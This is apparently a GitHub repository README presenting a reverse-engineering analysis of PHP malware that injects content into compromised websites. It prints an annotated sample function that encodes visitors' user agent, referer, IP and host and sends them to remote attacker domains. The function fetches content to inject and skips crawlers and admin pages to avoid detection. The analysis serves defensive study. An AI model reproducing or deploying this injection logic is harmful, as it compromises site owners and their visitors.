Skip to content
master
Go to file
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 

readme.md

Reverse Engineering PHP Malware Content injection

This repository is a result of a Reverse Engineering of PHP Malware that makes Content injection.

The full description can be found in english in (@todo add link here) and in portuguese in (@todo add link here)

Authors of this work (re rev.eng., not the malware):

  • Bernardo Donadio bcdonadio at bcdonadio.com
  • Emerson Rocha Luiz emerson at alligo.com.br

Sample code

/** REVENGNOTE: Do not assume that this malware will have same function names.
 *              even for the same malware.
 */
function day212()
{
	$a = check212("HTTP_USER_AGENT");
	$b = check212("HTTP_REFERER");
	$c = check212("REMOTE_ADDR");
	$d = check212("HTTP_HOST");
	$e = check212("PHP_SELF");

	/** REVENGNOTE: this next array does nothing here. But was on original code.
	 *              33db9538.com, 9507c4e8.com, e5b57288.com and 54dfa1cb.com
	 *              are domains that point (now) for the same working server
	 *              they are used to create content to inject on user code
	 *
	 */
	$domarr = array(
		"33db9538",
		"9507c4e8",
		"e5b57288",
		"54dfa1cb"
	);

	/** REVENGNOTE: this is very important. It does NOT inject content on site
	 *              if is a search engine (that could alert site admin of this
	 *              malware, and also does not load on pages that are like
	 *              for administratior interfaces. It also check for a valid
     *              HTTP_REFERER, so sometimes, share a link with a friend will
     *              not work at all, because you need navitate on the site before
     *              Is very likely that most common antivirus agents will maybe
     *              pass this basic check, but remote server will know they
     *              user agent and will return empty content.
	 */
	if (($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e) , "admin") or (preg_match("/" . implode("|", array(
		"google",
		"slurp",
		"msnbot",
		"ia_archiver",
		"yandex",
		"rambler"
	)) . "/i", strtolower($a)))) {
		$o1 = "";
	}
	else {
		$op = mt_rand(100000, 999999);
		$g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e)));
		$url = "http://" . cqq(".com") . "/" . $g4;
		$ca1 = en2(@gtd($url) , $op);
		$a1 = @explode("!NF0", $ca1);
		if (sizeof($a1) >= 2) $o1 = $a1[1];
		else $o1 = "";
	}

	return $o1;
}

DISCLAIMER

This is a reverse-engineering of malicious code found in compromised servers. The use of this code without explicit consent of the owner of the infrastructure constitutes a felony in many countries. Do not use except for educational purposes.

About

No description, website, or topics provided.

Resources

Releases

No releases published

Packages

No packages published

Languages

You can’t perform that action at this time.